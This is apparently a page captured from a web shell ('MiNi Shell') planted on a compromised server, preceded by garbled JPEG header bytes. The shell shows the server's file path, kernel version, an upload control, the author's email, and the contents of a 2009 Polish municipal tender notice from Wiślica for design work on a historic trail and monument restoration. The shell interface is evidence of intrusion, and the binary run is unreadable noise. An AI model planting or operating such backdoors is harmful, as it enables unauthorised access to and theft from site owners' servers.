JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20090707/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20090707/227174-N-2009.html

<p class="kh_header"><b>Wiślica: Opracowanie dokumentacji projektowej Tysiącletnia Wiślica - śladami świetności - urządzenie ścieżki historycznej, prace remontowe obiektów zabytkowych</b><br>
<b>Numer ogłoszenia: 227174 - 2009; data zamieszczenia: 07.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wiślica , ul. Okopowa 8, 28-160 Wiślica, woj. świętokrzyskie, tel. 041 3792106, faks 041 3722128.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ug.wislica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej Tysiącletnia Wiślica - śladami świetności - urządzenie ścieżki historycznej, prace remontowe obiektów zabytkowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie dokumentacji projektowo budowlano-wykonawczej dla  projektu Tysiącletnia Wiślica - śladami świetności - urządzenie ścieżki historycznej, prace remontowe obiektów zabytkowych: Pawilon archeologiczny, grodzisko, oświetlenie podziemi bazyliki, Rynek w Wiślicy na potrzeby  Gminy Wiślica  wraz z pełnieniem nadzoru autorskiego nad realizacją inwestycji
2. Szczegółowy zakres, 
Zakres prac dla zadania: 
a) opracowanie koncepcji projektu,
b)  opracowanie projektu budowlano- wykonawczego, 
c)  opracowanie na własny koszt map do celów projektowych,
d)	wykonanie kosztorysu inwestorskiego wraz z przedmiarem robót,
e)	sporządzenie specyfikacji technicznej wykonania i odbioru robót budowlanych,
f)	pełnienie nadzoru autorskiego nad realizacją inwestycji,
g)	prowadzenie uzgodnień z organami i instytucjami wg kompetencji w niezbędnym zakresie do uzyskania pozwolenia na budowę, 
h)	przygotowanie kompletnego wniosku o wydanie  pozwolenia na budowę,
i)	aktualizacja przedmiarów robót , kosztorysu inwestorskiego i ofertowego na pisemne wezwanie zamawiającego,
j)	wprowadzanie na pisemny wniosek zamawiającego zmian w projekcie .

3. Ilość i wyszczególnienie 
CZĘŚĆ I
1. Opracowanie koncepcji projektu  
a)	przebudowa Rynku w Wiślicy wraz z turystycznym ciągiem komunikacyjnym do Grodziska w ciągu ulic; plac Solny, ul. Kilińskiego (część) do figury Męki Pańskiej, byłego kościoła św. Marcina oraz ulicy do grodziska, 
b) 	urządzenie ścieżki turystycznej wzdłuż Sochacki (Starorzecze Nidy) z kładką do grodziska oraz zagospodarowaniem terenów zielonych wzdłuż ścieżki, wraz z wyczyszczeniem starorzecza z nieczystości; gałęzie, odpady złom itp.
c)	remont i rozbudowę pawilonu Archeologicznego przy ul. Batalionów Chłopskich,
d)	rozwiązanie dostępności do terenu Bazyliki dla niepełnosprawnych,
e)	oświetlenie podziemi bazyliki wraz z remontem wejścia,
f)	iluminację bazyliki,
g)	remont szaletu,
h)	oświetlenie terenów rekreacyjno sportowych oraz nasadzenie zieleni.

Koncepcja projektu zostanie zatwierdzona przez Zamawiającego. Uwagi i opinie zostaną przekazane Wykonawcy. Po konsultacjach należy je uwzględnić w  projekcje budowlano-wykonawczym.

CZĘŚĆ II
1. Opracowanie projektu budowlano-wykonawczego.
1) Projekt budowlany obiektów oznaczonych w Części I pkt 1, 
2) Projekt wykonawczy obiektów oznaczonych w Części I pkt 1.

Dokumenty będące przedmiotem umowy po uzyskaniu niezbędnych decyzji administracyjnych,  uzgodnień  należy wykonać w 5 egzemplarzach wraz z  zapisem na nośniku cyfrowym ( płyta CD/DVD, mapy , rysunki w formacie PDF do druku A4)

3) Materiały przetargowe 
- Opracowanie specyfikacji technicznej wykonania i odbioru robót 5 egz. w wersji papierowej oraz w wersji elektronicznej w formacie DOC i PDF ,
- Opracowanie przedmiarów robót - 5 egz. w wersji papierowej oraz w wersji elektronicznej współpracującej z programem Norma PRO Wersja 4.25,
- Opracowanie kosztorysów inwestorskich - 5 egz. w wersji papierowej oraz w wersji elektronicznej współpracującej z programem Norma PRO Wersja 4.25,

ZAKRES PRZEWIDZIANYCH DO WYKONANIA PRAC - zgodnie z pozytywna opinią ŚWKZ  w Kielcach z dnia 26.01.2009 roku, znak: IA-4330/173/09  - załącznik Nr 12

I.  Rewitalizacja Rynku i Placu Solnego wraz z obiektami i ulicami przyległymi - zgodnie z projektem decyzji Nr 3/09 o lokalizacji inwestycji celu publicznego z dnia 19.06.2009 roku  - załącznik Nr  7

 Przebudowa parku z Rynkiem - dz. 431
W projekcie przewiduje się 
- Usunięcie części istniejących drzew /uszkodzonych, chorych, rosnących Ew. miejscu przewidzianym na prowadzenie prac archeologicznych/,   
- modernizacja istniejącego oświetlenia parkowego / wymiana przewodu zasilającego NN oraz15 szt. nowych opraw/,
- chodniki z granitu, bądź  kostki brukowej - 2000 m2 
-Prace archeologiczne w Rynku /parku/na podstawie opracowanego Programu badań archeologicznych - załącznik Nr 9
-Wyeksponowanie fundamentów dawnego ratusza miejskiego / w przypadku odnalezienia fundamentów/.
- zieleń - 700 m2 nasadzenie nowych drzew, krzewów, trawników,
- mała architektura - 20 kpl  ławek i koszy na śmieci, fontanna 
-Zmiana systemu zasilania w energię elektryczną Rynku /Rozebranie chodników, wysepek przystankowych,  ułożenie kabli ziemnych NN, montaż nowych słupów oświetleniowych, zmiana sposobu zasilania w energię elektryczną istniejących budynków mieszkalnych, wykonanie chodników z kostki brukowej
			
 Pawilon Archeologiczny - remont i dobudowa dz. 1210, 670 /ul. Batalionów Chłopskich/

 Istniejący pawilon archeologiczny o pow. 260 m2, w którym znajdują się między innymi misa chrzcielna z IX w, oraz ruiny kościoła św. Mikołaja z X w. 
-Remont pawilonu /docieplenie, nowe pokrycie, odwodnieniu i osuszenie pawilonu, wymiana okien, i drzwi, tynkowanie i malowanie ścian oraz wykonanie elewacji zewnętrznej/ zgodnie z programem zatwierdzonym przez ŚWKZ - załącznik Nr 10 
-Dobudowa pomieszczenia z lekkiej konstrukcji /54 m2/, służącego do obsługi ruchu turystycznego i pełniące funkcję punktu informacyjnego.  
-Prace konserwatorskie misa chrzcielna z IX w, oraz ruiny kościoła św. Mikołaja z X w. 
    zgodnie z programem zatwierdzonym przez ŚWKZ - załącznik Nr 11

Remont schodów wraz z wykonaniem podjazdu dla osób niepełnosprawnych - dz. 433

Oświetlenie podziemi bazyliki wraz z remontem wejścia - dz. 437
-wymiana istniejącej instalacji elektrycznej oraz źródeł światła. 
-prac remontowo- konserwacyjne wejścia do podziemi w ustaleniu z ŚWKZ 
 Iluminacja bazyliki - dz. 437

-Ułożenie kabla ziemnego NN wraz z siecią reflektorów zamontowanych w istniejących trawnikach. 
		
Remont szaletu - dz.  360/1
-Remont sanitariatów, wymiana glazury ściennej i podłogowej, remont stropodachu oraz 	wejścia do szaletu.					           
Ścieżka na odcinku Plac Solny - Grodzisko - dz. 1065, 672, 677, 1199, 501/2, 509/1, 531/5, 493/2, 494/2

-Remont istniejących chodników i nawierzchni drogi / chodniki wymiana płyt na  kostkę brukową, remont nawierzchni asfaltowej/	

 Grodzisko - dz. 632
-Prace archeologiczne oraz wyrównanie nawierzchni wewnątrz grodziska zgodnie z zatwierdzonym przez ŚWKZ programem - załącznik Nr 9


II. Urządzenie ścieżki historycznej, dla których decyzją Nr 13/05 z dnia 15.03.2005 roku ustalono lokalizację inwestycji celu publicznego w zakresie infrastruktury technicznej - załącznik Nr 8

Ścieżka dydaktyczna od Grodziska obok Sochacki /zwyczajowa nazwa starorzecza rzeki/ wraz z mostkiem drewnianym i odmuleniem starorzecza do terenów rekreacyjnych - dz. 590/1, 678, 549, 531/2, 1200, 675
Ścieżka szer. 2 m o nawierzchni żwirowej i pow.1900 m2 wraz z kładką o dł. 26 mb nad starorzeczem rzeki Nidy. Na trasie ścieżki planuje się urządzenie ogródków dydaktycznych /12 szt./ z ławkami i tablicami informacyjnymi, w których zostanie nasadzona roślinność charakterystyczna dla terenu Ponidzia, bądź ogródki dydaktyczne opisujące dzieje Wiślicy na przestrzeni wieków IX-XX. Planuje się również wyczyszczenie istniejącego starorzecza z nieczystości; gałęzie, odpady złom itp.
Ścieżka swój bieg będzie rozpoczynać obok grodziska, a kończyć się na parkingu zlokalizowanym obok istniejących terenów rekreacyjno - sportowych.

Tereny rekreacyjno - sportowe - dz 485, 486/3, 486/4, 675	

Na urządzonych w roku 2006 terenach rekreacyjno - sportowych o pow. 10000 m2  znajdują się boiska do mini piłki nożnej, siatkówki plażowej, koszykówki, drewniana estrada, Kurna chata - grill, ponad 2000 m2  alejek spacerowych, plac zabaw dla dzieci oraz wyeksponowane fundamenty ruin kościoła św. Ducha.
	Tereny te ze względu na brak środków nie zostały oświetlone, brak jest również drzew i krzewów. W związku z powyższym planuje się montaż 15 szt. stylowych słupów oświetleniowych wraz z oprawami / ziemny przewód elektryczny zasilający został położony w roku 2006/ , wykonanie nasadzeń drzew i krzewów w ilości 450 szt,.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy potwierdzający spełnienie warunków:

1.1 Posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
1.1.1 Złożenie aktualnego odpisu z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  
1.1.2 Złożenie dokumentów potwierdzających posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych.  

1.2 Posiadający niezbędna wiedzę i doświadczenie oraz dysponujący potencjałem technicznym i osobami zdolnymi do wykonania zamówienia; lub którzy przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
1.2.1 Złożenie wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców wraz z dokumentami potwierdzającymi, że usługi te zostały wykonane należycie.  
Za spełnianie warunków Zamawiający uzna, jeżeli Wykonawca wykaże co najmniej dwie usługi projektowe związane z projektowaniem obiektów zabytkowych, w tym aranżacja przestrzeni historycznej tożsame z zakresem i wartością zamówienia w okresie ostatnich 3 lat z tym, że wartość kosztorysowa każdej z wykazanej usługi nie może być mniejsza niż 3 000 000,00 zł.
1.2.2 Złożenie wykazu osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie tym wykonawca wskazał osoby, którymi będzie dysponował  - Załącznik nr 6 do SIWZ,
Zamawiający wymaga od Wykonawcy aby dysponował osobami posiadającymi uprawnienia budowlane w następujących specjalnościach:
a)	Uprawnienia budowlane w specjalności architektonicznej bez ograniczeń,
b)	Uprawnienia budowlane w specjalności drogowej bez ograniczeń,
c)	Uprawnienia budowlane w specjalności konstrukcyjno-budowlanej bez ograniczeń,
d)	Uprawnienia budowlane w specjalności instalacji w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń
1.2.3 Złożenie dokumentów stwierdzających, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. Dla każdej wykazanej osoby należy dołączyć kopię dokumentów potwierdzających uprawnienia budowlane oraz zaświadczenie o przynależności tej osoby do Okręgowej Izby Samorządu Zawodowego.
1.3 Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia - Zamawiający nie wymaga dokumentów.

1.4 Nie podlegający wykluczeniu z postępowania o udzielenie zamówienia.
1.4.1 Złożenie oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu z art. 22 Prawa zamówień publicznych - Załącznik Nr 3 do SIWZ.   

2. Z ubiegania się o zamówienia publicznego wyklucza się wykonawców, którzy:
2.1 nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 Prawa zamówień publicznych opisanych w ppkt. 1.1 do 1.4.
2.2 podlegają  wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 Prawa zamówień publicznych.
3. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna.

4. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej:
4.1) Zamiast dokumentów, o których mowa w  pkt 1, pdp 1.1, punktor 1.1.1  składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
-  nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych w niniejszym pkt. 4  zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionych nie wcześniej niż w terminach określonych w niniejszym pkt 4.   

5. Dokumenty wymagane w przypadku składania oferty wspólnej: 

5.1 Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy

  - Oferta winna zawierać: oświadczenia i dokumenty opisane w pkt. 1 dla każdego partnera z osobna, pozostałe dokumenty składane są wspólnie.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1) Formularz ofertowy - wypełniony i podpisany przez wykonawcę - Załącznik Nr 1 do SIWZ,
2) Wykaz podwykonawców zgodnie z załączonym drukiem - Załącznik Nr 2 do SIWZ,
3)    Postanowienia umowy - parafowany przez wykonawcę - Załącznik Nr 3 do SIWZ,
4) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem,
5) Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych.  
6) Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu z art. 22 Prawa zamówień publicznych - Załącznik Nr 4 do SIWZ,   
7) Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców wraz z dokumentami potwierdzającymi, że usługi te zostały wykonane należycie. Za spełnianie warunków Zamawiający uzna, jeżeli Wykonawca wykaże co najmniej dwie usługi projektowe związane z projektowaniem obiektów zabytkowych, w tym aranżacja przestrzeni historycznej tożsame z zakresem i wartością zamówienia w okresie ostatnich 3 lat z tym, że wartość kosztorysowa każdej z wykazanej usługi nie może być mniejsza niż 3 000 000,00 zł.- Załącznik Nr 5 do SIWZ. 
8 Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia (dla każdej wykazanej osoby należy dołączyć kopię dokumentów potwierdzających uprawnienia budowlane oraz zaświadczenie o przynależności tej osoby do Okręgowej Izby Samorządu Zawodowego) a także zakresu wykonywanych przez nie czynności.- Załącznik Nr 6 do SIWZ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.ug.wislica.pl - zakładka Zamówienia publiczne.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Na wniosek Wykonawcy Specyfikację istotnych warunków zamówienia można uzyskać bezpłatnie w Urzędzie Gminy w Wiślicy, ul. Okopowa 8, pok. 12, osobiście pobrać SIWZ w wersji papierowej lub pocztą.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.07.2009 godzina 08:00, miejsce: Urząd Gminy w Wiślicy, ul. Okopowa 8, 28-160 Wiślica, Sekretariat I piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com